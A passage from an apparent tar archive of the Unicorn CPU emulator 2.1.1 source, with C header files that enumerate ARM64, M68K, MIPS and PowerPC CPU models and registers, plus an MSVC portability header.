UC_ARM64_REG_D22, UC_ARM64_REG_D23, UC_ARM64_REG_D24, UC_ARM64_REG_D25, UC_ARM64_REG_D26, UC_ARM64_REG_D27, UC_ARM64_REG_D28, UC_ARM64_REG_D29, UC_ARM64_REG_D30, UC_ARM64_REG_D31, UC_ARM64_REG_H0, UC_ARM64_REG_H1, UC_ARM64_REG_H2, UC_ARM64_REG_H3, UC_ARM64_REG_H4, UC_ARM64_REG_H5, UC_ARM64_REG_H6, UC_ARM64_REG_H7, UC_ARM64_REG_H8, UC_ARM64_REG_H9, UC_ARM64_REG_H10, UC_ARM64_REG_H11, UC_ARM64_REG_H12, UC_ARM64_REG_H13, UC_ARM64_REG_H14, UC_ARM64_REG_H15, UC_ARM64_REG_H16, UC_ARM64_REG_H17, UC_ARM64_REG_H18, UC_ARM64_REG_H19, UC_ARM64_REG_H20, UC_ARM64_REG_H21, UC_ARM64_REG_H22, UC_ARM64_REG_H23, UC_ARM64_REG_H24, UC_ARM64_REG_H25, UC_ARM64_REG_H26, UC_ARM64_REG_H27, UC_ARM64_REG_H28, UC_ARM64_REG_H29, UC_ARM64_REG_H30, UC_ARM64_REG_H31, UC_ARM64_REG_Q0, UC_ARM64_REG_Q1, UC_ARM64_REG_Q2, UC_ARM64_REG_Q3, UC_ARM64_REG_Q4, UC_ARM64_REG_Q5, UC_ARM64_REG_Q6, UC_ARM64_REG_Q7, UC_ARM64_REG_Q8, UC_ARM64_REG_Q9, UC_ARM64_REG_Q10, UC_ARM64_REG_Q11, UC_ARM64_REG_Q12, UC_ARM64_REG_Q13, UC_ARM64_REG_Q14, UC_ARM64_REG_Q15, UC_ARM64_REG_Q16, UC_ARM64_REG_Q17, UC_ARM64_REG_Q18, UC_ARM64_REG_Q19, UC_ARM64_REG_Q20, UC_ARM64_REG_Q21, UC_ARM64_REG_Q22, UC_ARM64_REG_Q23, UC_ARM64_REG_Q24, UC_ARM64_REG_Q25, UC_ARM64_REG_Q26, UC_ARM64_REG_Q27, UC_ARM64_REG_Q28, UC_ARM64_REG_Q29, UC_ARM64_REG_Q30, UC_ARM64_REG_Q31, UC_ARM64_REG_S0, UC_ARM64_REG_S1, UC_ARM64_REG_S2, UC_ARM64_REG_S3, UC_ARM64_REG_S4, UC_ARM64_REG_S5, UC_ARM64_REG_S6, UC_ARM64_REG_S7, UC_ARM64_REG_S8, UC_ARM64_REG_S9, UC_ARM64_REG_S10, UC_ARM64_REG_S11, UC_ARM64_REG_S12, UC_ARM64_REG_S13, UC_ARM64_REG_S14, UC_ARM64_REG_S15, UC_ARM64_REG_S16, UC_ARM64_REG_S17, UC_ARM64_REG_S18, UC_ARM64_REG_S19, UC_ARM64_REG_S20, UC_ARM64_REG_S21, UC_ARM64_REG_S22, UC_ARM64_REG_S23, UC_ARM64_REG_S24, UC_ARM64_REG_S25, UC_ARM64_REG_S26, UC_ARM64_REG_S27, UC_ARM64_REG_S28, UC_ARM64_REG_S29, UC_ARM64_REG_S30, UC_ARM64_REG_S31, UC_ARM64_REG_W0, UC_ARM64_REG_W1, UC_ARM64_REG_W2, UC_ARM64_REG_W3, UC_ARM64_REG_W4, UC_ARM64_REG_W5, UC_ARM64_REG_W6, UC_ARM64_REG_W7, UC_ARM64_REG_W8, UC_ARM64_REG_W9, UC_ARM64_REG_W10, UC_ARM64_REG_W11, UC_ARM64_REG_W12, UC_ARM64_REG_W13, UC_ARM64_REG_W14, UC_ARM64_REG_W15, UC_ARM64_REG_W16, UC_ARM64_REG_W17, UC_ARM64_REG_W18, UC_ARM64_REG_W19, UC_ARM64_REG_W20, UC_ARM64_REG_W21, UC_ARM64_REG_W22, UC_ARM64_REG_W23, UC_ARM64_REG_W24, UC_ARM64_REG_W25, UC_ARM64_REG_W26, UC_ARM64_REG_W27, UC_ARM64_REG_W28, UC_ARM64_REG_W29, UC_ARM64_REG_W30, UC_ARM64_REG_X0, UC_ARM64_REG_X1, UC_ARM64_REG_X2, UC_ARM64_REG_X3, UC_ARM64_REG_X4, UC_ARM64_REG_X5, UC_ARM64_REG_X6, UC_ARM64_REG_X7, UC_ARM64_REG_X8, UC_ARM64_REG_X9, UC_ARM64_REG_X10, UC_ARM64_REG_X11, UC_ARM64_REG_X12, UC_ARM64_REG_X13, UC_ARM64_REG_X14, UC_ARM64_REG_X15, UC_ARM64_REG_X16, UC_ARM64_REG_X17, UC_ARM64_REG_X18, UC_ARM64_REG_X19, UC_ARM64_REG_X20, UC_ARM64_REG_X21, UC_ARM64_REG_X22, UC_ARM64_REG_X23, UC_ARM64_REG_X24, UC_ARM64_REG_X25, UC_ARM64_REG_X26, UC_ARM64_REG_X27, UC_ARM64_REG_X28, UC_ARM64_REG_V0, UC_ARM64_REG_V1, UC_ARM64_REG_V2, UC_ARM64_REG_V3, UC_ARM64_REG_V4, UC_ARM64_REG_V5, UC_ARM64_REG_V6, UC_ARM64_REG_V7, UC_ARM64_REG_V8, UC_ARM64_REG_V9, UC_ARM64_REG_V10, UC_ARM64_REG_V11, UC_ARM64_REG_V12, UC_ARM64_REG_V13, UC_ARM64_REG_V14, UC_ARM64_REG_V15, UC_ARM64_REG_V16, UC_ARM64_REG_V17, UC_ARM64_REG_V18, UC_ARM64_REG_V19, UC_ARM64_REG_V20, UC_ARM64_REG_V21, UC_ARM64_REG_V22, UC_ARM64_REG_V23, UC_ARM64_REG_V24, UC_ARM64_REG_V25, UC_ARM64_REG_V26, UC_ARM64_REG_V27, UC_ARM64_REG_V28, UC_ARM64_REG_V29, UC_ARM64_REG_V30, UC_ARM64_REG_V31, //> pseudo registers UC_ARM64_REG_PC, // program counter register UC_ARM64_REG_CPACR_EL1, //> thread registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0, UC_ARM64_REG_TPIDRRO_EL0, UC_ARM64_REG_TPIDR_EL1, UC_ARM64_REG_PSTATE, //> exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_ELR_EL0, UC_ARM64_REG_ELR_EL1, UC_ARM64_REG_ELR_EL2, UC_ARM64_REG_ELR_EL3, //> stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_SP_EL0, UC_ARM64_REG_SP_EL1, UC_ARM64_REG_SP_EL2, UC_ARM64_REG_SP_EL3, //> other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TTBR0_EL1, UC_ARM64_REG_TTBR1_EL1, UC_ARM64_REG_ESR_EL0, UC_ARM64_REG_ESR_EL1, UC_ARM64_REG_ESR_EL2, UC_ARM64_REG_ESR_EL3, UC_ARM64_REG_FAR_EL0, UC_ARM64_REG_FAR_EL1, UC_ARM64_REG_FAR_EL2, UC_ARM64_REG_FAR_EL3, UC_ARM64_REG_PAR_EL1, UC_ARM64_REG_MAIR_EL1, UC_ARM64_REG_VBAR_EL0, UC_ARM64_REG_VBAR_EL1, UC_ARM64_REG_VBAR_EL2, UC_ARM64_REG_VBAR_EL3, UC_ARM64_REG_CP_REG, //> floating point control and status registers UC_ARM64_REG_FPCR, UC_ARM64_REG_FPSR, UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers //> alias registers UC_ARM64_REG_IP0 = UC_ARM64_REG_X16, UC_ARM64_REG_IP1 = UC_ARM64_REG_X17, UC_ARM64_REG_FP = UC_ARM64_REG_X29, UC_ARM64_REG_LR = UC_ARM64_REG_X30, } uc_arm64_reg; // Callback function for tracing MRS/MSR/SYS/SYSL. If this callback returns // true, the read/write to system registers would be skipped (even though it may // cause exceptions!). Note one callback per instruction is allowed. // @reg: The source/destination register. // @cp_reg: The source/destincation system register. // @user_data: The user data. typedef uint32_t (*uc_cb_insn_sys_t)(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg, void *user_data); //> ARM64 instructions typedef enum uc_arm64_insn { UC_ARM64_INS_INVALID = 0, UC_ARM64_INS_MRS, UC_ARM64_INS_MSR, UC_ARM64_INS_SYS, UC_ARM64_INS_SYSL, UC_ARM64_INS_ENDING } uc_arm64_insn; #ifdef __cplusplus } #endif #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/m68k.h����������������������������������������������������������������0000664�0000000�0000000�00000002235�14675241067�0017244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_M68K_H #define UNICORN_M68K_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> M68K CPU typedef enum uc_cpu_m68k { UC_CPU_M68K_M5206 = 0, UC_CPU_M68K_M68000, UC_CPU_M68K_M68020, UC_CPU_M68K_M68030, UC_CPU_M68K_M68040, UC_CPU_M68K_M68060, UC_CPU_M68K_M5208, UC_CPU_M68K_CFV4E, UC_CPU_M68K_ANY, UC_CPU_M68K_ENDING } uc_cpu_m68k; //> M68K registers typedef enum uc_m68k_reg { UC_M68K_REG_INVALID = 0, UC_M68K_REG_A0, UC_M68K_REG_A1, UC_M68K_REG_A2, UC_M68K_REG_A3, UC_M68K_REG_A4, UC_M68K_REG_A5, UC_M68K_REG_A6, UC_M68K_REG_A7, UC_M68K_REG_D0, UC_M68K_REG_D1, UC_M68K_REG_D2, UC_M68K_REG_D3, UC_M68K_REG_D4, UC_M68K_REG_D5, UC_M68K_REG_D6, UC_M68K_REG_D7, UC_M68K_REG_SR, UC_M68K_REG_PC, UC_M68K_REG_ENDING, // <-- mark the end of the list of registers } uc_m68k_reg; #ifdef __cplusplus } #endif #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/mips.h����������������������������������������������������������������0000664�0000000�0000000�00000014115�14675241067�0017427�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_MIPS_H #define UNICORN_MIPS_H #ifdef __cplusplus extern "C" { #endif // GCC MIPS toolchain has a default macro called "mips" which breaks // compilation #undef mips #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> MIPS32 CPUS typedef enum uc_cpu_mips32 { UC_CPU_MIPS32_4KC = 0, UC_CPU_MIPS32_4KM, UC_CPU_MIPS32_4KECR1, UC_CPU_MIPS32_4KEMR1, UC_CPU_MIPS32_4KEC, UC_CPU_MIPS32_4KEM, UC_CPU_MIPS32_24KC, UC_CPU_MIPS32_24KEC, UC_CPU_MIPS32_24KF, UC_CPU_MIPS32_34KF, UC_CPU_MIPS32_74KF, UC_CPU_MIPS32_M14K, UC_CPU_MIPS32_M14KC, UC_CPU_MIPS32_P5600, UC_CPU_MIPS32_MIPS32R6_GENERIC, UC_CPU_MIPS32_I7200, UC_CPU_MIPS32_ENDING } uc_cpu_mips32; //> MIPS64 CPUS typedef enum uc_cpu_mips64 { UC_CPU_MIPS64_R4000 = 0, UC_CPU_MIPS64_VR5432, UC_CPU_MIPS64_5KC, UC_CPU_MIPS64_5KF, UC_CPU_MIPS64_20KC, UC_CPU_MIPS64_MIPS64R2_GENERIC, UC_CPU_MIPS64_5KEC, UC_CPU_MIPS64_5KEF, UC_CPU_MIPS64_I6400, UC_CPU_MIPS64_I6500, UC_CPU_MIPS64_LOONGSON_2E, UC_CPU_MIPS64_LOONGSON_2F, UC_CPU_MIPS64_MIPS64DSPR2, UC_CPU_MIPS64_ENDING } uc_cpu_mips64; //> MIPS registers typedef enum UC_MIPS_REG { UC_MIPS_REG_INVALID = 0, //> General purpose registers UC_MIPS_REG_PC, UC_MIPS_REG_0, UC_MIPS_REG_1, UC_MIPS_REG_2, UC_MIPS_REG_3, UC_MIPS_REG_4, UC_MIPS_REG_5, UC_MIPS_REG_6, UC_MIPS_REG_7, UC_MIPS_REG_8, UC_MIPS_REG_9, UC_MIPS_REG_10, UC_MIPS_REG_11, UC_MIPS_REG_12, UC_MIPS_REG_13, UC_MIPS_REG_14, UC_MIPS_REG_15, UC_MIPS_REG_16, UC_MIPS_REG_17, UC_MIPS_REG_18, UC_MIPS_REG_19, UC_MIPS_REG_20, UC_MIPS_REG_21, UC_MIPS_REG_22, UC_MIPS_REG_23, UC_MIPS_REG_24, UC_MIPS_REG_25, UC_MIPS_REG_26, UC_MIPS_REG_27, UC_MIPS_REG_28, UC_MIPS_REG_29, UC_MIPS_REG_30, UC_MIPS_REG_31, //> DSP registers UC_MIPS_REG_DSPCCOND, UC_MIPS_REG_DSPCARRY, UC_MIPS_REG_DSPEFI, UC_MIPS_REG_DSPOUTFLAG, UC_MIPS_REG_DSPOUTFLAG16_19, UC_MIPS_REG_DSPOUTFLAG20, UC_MIPS_REG_DSPOUTFLAG21, UC_MIPS_REG_DSPOUTFLAG22, UC_MIPS_REG_DSPOUTFLAG23, UC_MIPS_REG_DSPPOS, UC_MIPS_REG_DSPSCOUNT, //> ACC registers UC_MIPS_REG_AC0, UC_MIPS_REG_AC1, UC_MIPS_REG_AC2, UC_MIPS_REG_AC3, //> COP registers UC_MIPS_REG_CC0, UC_MIPS_REG_CC1, UC_MIPS_REG_CC2, UC_MIPS_REG_CC3, UC_MIPS_REG_CC4, UC_MIPS_REG_CC5, UC_MIPS_REG_CC6, UC_MIPS_REG_CC7, //> FPU registers UC_MIPS_REG_F0, UC_MIPS_REG_F1, UC_MIPS_REG_F2, UC_MIPS_REG_F3, UC_MIPS_REG_F4, UC_MIPS_REG_F5, UC_MIPS_REG_F6, UC_MIPS_REG_F7, UC_MIPS_REG_F8, UC_MIPS_REG_F9, UC_MIPS_REG_F10, UC_MIPS_REG_F11, UC_MIPS_REG_F12, UC_MIPS_REG_F13, UC_MIPS_REG_F14, UC_MIPS_REG_F15, UC_MIPS_REG_F16, UC_MIPS_REG_F17, UC_MIPS_REG_F18, UC_MIPS_REG_F19, UC_MIPS_REG_F20, UC_MIPS_REG_F21, UC_MIPS_REG_F22, UC_MIPS_REG_F23, UC_MIPS_REG_F24, UC_MIPS_REG_F25, UC_MIPS_REG_F26, UC_MIPS_REG_F27, UC_MIPS_REG_F28, UC_MIPS_REG_F29, UC_MIPS_REG_F30, UC_MIPS_REG_F31, UC_MIPS_REG_FCC0, UC_MIPS_REG_FCC1, UC_MIPS_REG_FCC2, UC_MIPS_REG_FCC3, UC_MIPS_REG_FCC4, UC_MIPS_REG_FCC5, UC_MIPS_REG_FCC6, UC_MIPS_REG_FCC7, //> AFPR128 UC_MIPS_REG_W0, UC_MIPS_REG_W1, UC_MIPS_REG_W2, UC_MIPS_REG_W3, UC_MIPS_REG_W4, UC_MIPS_REG_W5, UC_MIPS_REG_W6, UC_MIPS_REG_W7, UC_MIPS_REG_W8, UC_MIPS_REG_W9, UC_MIPS_REG_W10, UC_MIPS_REG_W11, UC_MIPS_REG_W12, UC_MIPS_REG_W13, UC_MIPS_REG_W14, UC_MIPS_REG_W15, UC_MIPS_REG_W16, UC_MIPS_REG_W17, UC_MIPS_REG_W18, UC_MIPS_REG_W19, UC_MIPS_REG_W20, UC_MIPS_REG_W21, UC_MIPS_REG_W22, UC_MIPS_REG_W23, UC_MIPS_REG_W24, UC_MIPS_REG_W25, UC_MIPS_REG_W26, UC_MIPS_REG_W27, UC_MIPS_REG_W28, UC_MIPS_REG_W29, UC_MIPS_REG_W30, UC_MIPS_REG_W31, UC_MIPS_REG_HI, UC_MIPS_REG_LO, UC_MIPS_REG_P0, UC_MIPS_REG_P1, UC_MIPS_REG_P2, UC_MIPS_REG_MPL0, UC_MIPS_REG_MPL1, UC_MIPS_REG_MPL2, UC_MIPS_REG_CP0_CONFIG3, UC_MIPS_REG_CP0_USERLOCAL, UC_MIPS_REG_CP0_STATUS, UC_MIPS_REG_ENDING, // <-- mark the end of the list or registers // alias registers UC_MIPS_REG_ZERO = UC_MIPS_REG_0, UC_MIPS_REG_AT = UC_MIPS_REG_1, UC_MIPS_REG_V0 = UC_MIPS_REG_2, UC_MIPS_REG_V1 = UC_MIPS_REG_3, UC_MIPS_REG_A0 = UC_MIPS_REG_4, UC_MIPS_REG_A1 = UC_MIPS_REG_5, UC_MIPS_REG_A2 = UC_MIPS_REG_6, UC_MIPS_REG_A3 = UC_MIPS_REG_7, UC_MIPS_REG_T0 = UC_MIPS_REG_8, UC_MIPS_REG_T1 = UC_MIPS_REG_9, UC_MIPS_REG_T2 = UC_MIPS_REG_10, UC_MIPS_REG_T3 = UC_MIPS_REG_11, UC_MIPS_REG_T4 = UC_MIPS_REG_12, UC_MIPS_REG_T5 = UC_MIPS_REG_13, UC_MIPS_REG_T6 = UC_MIPS_REG_14, UC_MIPS_REG_T7 = UC_MIPS_REG_15, UC_MIPS_REG_S0 = UC_MIPS_REG_16, UC_MIPS_REG_S1 = UC_MIPS_REG_17, UC_MIPS_REG_S2 = UC_MIPS_REG_18, UC_MIPS_REG_S3 = UC_MIPS_REG_19, UC_MIPS_REG_S4 = UC_MIPS_REG_20, UC_MIPS_REG_S5 = UC_MIPS_REG_21, UC_MIPS_REG_S6 = UC_MIPS_REG_22, UC_MIPS_REG_S7 = UC_MIPS_REG_23, UC_MIPS_REG_T8 = UC_MIPS_REG_24, UC_MIPS_REG_T9 = UC_MIPS_REG_25, UC_MIPS_REG_K0 = UC_MIPS_REG_26, UC_MIPS_REG_K1 = UC_MIPS_REG_27, UC_MIPS_REG_GP = UC_MIPS_REG_28, UC_MIPS_REG_SP = UC_MIPS_REG_29, UC_MIPS_REG_FP = UC_MIPS_REG_30, UC_MIPS_REG_S8 = UC_MIPS_REG_30, UC_MIPS_REG_RA = UC_MIPS_REG_31, UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0, UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1, UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2, UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3, UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0, UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1, UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2, UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3, } UC_MIPS_REG; #ifdef __cplusplus } #endif #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/platform.h������������������������������������������������������������0000664�0000000�0000000�00000015235�14675241067�0020307�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ /* This file is to support header files that are missing in MSVC and other non-standard compilers. */ #ifndef UNICORN_PLATFORM_H #define UNICORN_PLATFORM_H /* These are the various MSVC versions as given by _MSC_VER: MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015) MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013) MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012) MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010) MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008) MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005) MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio 2003) MSVC++ 7.0 _MSC_VER == 1300 MSVC++ 6.0 _MSC_VER == 1200 MSVC++ 5.0 _MSC_VER == 1100 */ #define MSC_VER_VS2003 1310 #define MSC_VER_VS2005 1400 #define MSC_VER_VS2008 1500 #define MSC_VER_VS2010 1600 #define MSC_VER_VS2012 1700 #define MSC_VER_VS2013 1800 #define MSC_VER_VS2015 1900 // handle stdbool.h compatibility #if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && \ (defined(WIN32) || defined(WIN64) || defined(_WIN32) || defined(_WIN64)) // MSVC // stdbool.h #if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) // this system does not have stdbool.h #ifndef __cplusplus typedef unsigned char bool; #define false 0 #define true 1 #endif // __cplusplus #else // VisualStudio 2013+ -> C99 is supported #include <stdbool.h> #endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) #else // not MSVC -> C99 is supported #include <stdbool.h> #endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) // && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined // (_WIN64)) #if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) // this system does not have stdint.h typedef signed char int8_t; typedef signed short int16_t; typedef signed int int32_t; typedef unsigned char uint8_t; typedef unsigned short uint16_t; typedef unsigned int uint32_t; typedef signed long long int64_t; typedef unsigned long long uint64_t; typedef signed char int_fast8_t; typedef int int_fast16_t; typedef int int_fast32_t; typedef long long int_fast64_t; typedef unsigned char uint_fast8_t; typedef unsigned int uint_fast16_t; typedef unsigned int uint_fast32_t; typedef unsigned long long uint_fast64_t; #if !defined(_W64) #if !defined(__midl) && (defined(_X86_) || defined(_M_IX86)) && _MSC_VER >= 1300 #define _W64 __w64 #else #define _W64 #endif #endif #ifndef _INTPTR_T_DEFINED #define _INTPTR_T_DEFINED #ifdef _WIN64 typedef long long intptr_t; #else /* _WIN64 */ typedef _W64 int intptr_t; #endif /* _WIN64 */ #endif /* _INTPTR_T_DEFINED */ #ifndef _UINTPTR_T_DEFINED #define _UINTPTR_T_DEFINED #ifdef _WIN64 typedef unsigned long long uintptr_t; #else /* _WIN64 */ typedef _W64 unsigned int uintptr_t; #endif /* _WIN64 */ #endif /* _UINTPTR_T_DEFINED */ #define INT8_MIN (-127i8 - 1) #define INT16_MIN (-32767i16 - 1) #define INT32_MIN (-2147483647i32 - 1) #define INT64_MIN (-9223372036854775807i64 - 1) #define INT8_MAX 127i8 #define INT16_MAX 32767i16 #define INT32_MAX 2147483647i32 #define INT64_MAX 9223372036854775807i64 #define UINT8_MAX 0xffui8 #define UINT16_MAX 0xffffui16 #define UINT32_MAX 0xffffffffui32 #define UINT64_MAX 0xffffffffffffffffui64 #define INT_FAST8_MIN INT8_MIN #define INT_FAST16_MIN INT32_MIN #define INT_FAST32_MIN INT32_MIN #define INT_FAST64_MIN INT64_MIN #define INT_FAST8_MAX INT8_MAX #define INT_FAST16_MAX INT32_MAX #define INT_FAST32_MAX INT32_MAX #define INT_FAST64_MAX INT64_MAX #define UINT_FAST8_MAX UINT8_MAX #define UINT_FAST16_MAX UINT32_MAX #define UINT_FAST32_MAX UINT32_MAX #define UINT_FAST64_MAX UINT64_MAX #ifdef _WIN64 #define INTPTR_MIN INT64_MIN #define INTPTR_MAX INT64_MAX #define UINTPTR_MAX UINT64_MAX #else /* _WIN64 */ #define INTPTR_MIN INT32_MIN #define INTPTR_MAX INT32_MAX #define UINTPTR_MAX UINT32_MAX #endif /* _WIN64 */ #else // this system has stdint.h #if defined(_MSC_VER) && (_MSC_VER == MSC_VER_VS2010) #define _INTPTR 2 #endif #include <stdint.h> #endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || // defined(_KERNEL_MODE) // handle inttypes.h compatibility #if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE) // this system does not have inttypes.h #define __PRI_8_LENGTH_MODIFIER__ "hh" #define __PRI_64_LENGTH_MODIFIER__ "ll" #define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" #define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" #define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" #define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" #define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" #define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" #define PRId16 "hd" #define PRIi16 "hi" #define PRIo16 "ho" #define PRIu16 "hu" #define PRIx16 "hx" #define PRIX16 "hX" #if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) #define PRId32 "ld" #define PRIi32 "li" #define PRIo32 "lo" #define PRIu32 "lu" #define PRIx32 "lx" #define PRIX32 "lX" #else // OSX #define PRId32 "d" #define PRIi32 "i" #define PRIo32 "o" #define PRIu32 "u" #define PRIx32 "x" #define PRIX32 "X" #endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) #if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) // redefine functions from inttypes.h used in cstool #define strtoull _strtoui64 #endif #define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" #define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" #define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" #define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" #define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" #define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" #else // this system has inttypes.h by default #include <inttypes.h> #endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) || // defined(_KERNEL_MODE) // sys/time.h compatibility #if defined(_MSC_VER) #include <sys/types.h> #include <sys/timeb.h> #include <windows.h> #else #include <sys/time.h> #endif // unistd.h compatibility #if defined(_MSC_VER) static int usleep(uint32_t usec) { HANDLE timer; LARGE_INTEGER due; timer = CreateWaitableTimer(NULL, TRUE, NULL); if (!timer) return -1; due.QuadPart = (-((int64_t)usec)) * 10LL; if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) { CloseHandle(timer); return -1; } WaitForSingleObject(timer, INFINITE); CloseHandle(timer); return 0; } #else #include <unistd.h> #endif // misc support #if defined(_MSC_VER) #ifdef _WIN64 typedef signed __int64 ssize_t; #else typedef _W64 signed int ssize_t; #endif #ifndef va_copy #define va_copy(d, s) ((d) = (s)) #endif #define strcasecmp _stricmp #if (_MSC_VER < MSC_VER_VS2015) #define snprintf _snprintf #endif #if (_MSC_VER <= MSC_VER_VS2013) #define strtoll _strtoi64 #endif #endif #endif // UNICORN_PLATFORM_H �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/ppc.h�����������������������������������������������������������������0000664�0000000�0000000�00000025047�14675241067�0017247�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_PPC_H #define UNICORN_PPC_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> PPC CPU typedef enum uc_cpu_ppc { UC_CPU_PPC32_401 = 0, UC_CPU_PPC32_401A1, UC_CPU_PPC32_401B2, UC_CPU_PPC32_401C2, UC_CPU_PPC32_401D2, UC_CPU_PPC32_401E2, UC_CPU_PPC32_401F2, UC_CPU_PPC32_401G2, UC_CPU_PPC32_IOP480, UC_CPU_PPC32_COBRA, UC_CPU_PPC32_403GA, UC_CPU_PPC32_403GB, UC_CPU_PPC32_403GC, UC_CPU_PPC32_403GCX, UC_CPU_PPC32_405D2, UC_CPU_PPC32_405D4, UC_CPU_PPC32_405CRA, UC_CPU_PPC32_405CRB, UC_CPU_PPC32_405CRC, UC_CPU_PPC32_405EP, UC_CPU_PPC32_405EZ, UC_CPU_PPC32_405GPA, UC_CPU_PPC32_405GPB, UC_CPU_PPC32_405GPC, UC_CPU_PPC32_405GPD, UC_CPU_PPC32_405GPR, UC_CPU_PPC32_405LP, UC_CPU_PPC32_NPE405H, UC_CPU_PPC32_NPE405H2, UC_CPU_PPC32_NPE405L, UC_CPU_PPC32_NPE4GS3, UC_CPU_PPC32_STB03, UC_CPU_PPC32_STB04, UC_CPU_PPC32_STB25, UC_CPU_PPC32_X2VP4, UC_CPU_PPC32_X2VP20, UC_CPU_PPC32_440_XILINX, UC_CPU_PPC32_440_XILINX_W_DFPU, UC_CPU_PPC32_440EPA, UC_CPU_PPC32_440EPB, UC_CPU_PPC32_440EPX, UC_CPU_PPC32_460EXB, UC_CPU_PPC32_G2, UC_CPU_PPC32_G2H4, UC_CPU_PPC32_G2GP, UC_CPU_PPC32_G2LS, UC_CPU_PPC32_G2HIP3, UC_CPU_PPC32_G2HIP4, UC_CPU_PPC32_MPC603, UC_CPU_PPC32_G2LE, UC_CPU_PPC32_G2LEGP, UC_CPU_PPC32_G2LELS, UC_CPU_PPC32_G2LEGP1, UC_CPU_PPC32_G2LEGP3, UC_CPU_PPC32_MPC5200_V10, UC_CPU_PPC32_MPC5200_V11, UC_CPU_PPC32_MPC5200_V12, UC_CPU_PPC32_MPC5200B_V20, UC_CPU_PPC32_MPC5200B_V21, UC_CPU_PPC32_E200Z5, UC_CPU_PPC32_E200Z6, UC_CPU_PPC32_E300C1, UC_CPU_PPC32_E300C2, UC_CPU_PPC32_E300C3, UC_CPU_PPC32_E300C4, UC_CPU_PPC32_MPC8343, UC_CPU_PPC32_MPC8343A, UC_CPU_PPC32_MPC8343E, UC_CPU_PPC32_MPC8343EA, UC_CPU_PPC32_MPC8347T, UC_CPU_PPC32_MPC8347P, UC_CPU_PPC32_MPC8347AT, UC_CPU_PPC32_MPC8347AP, 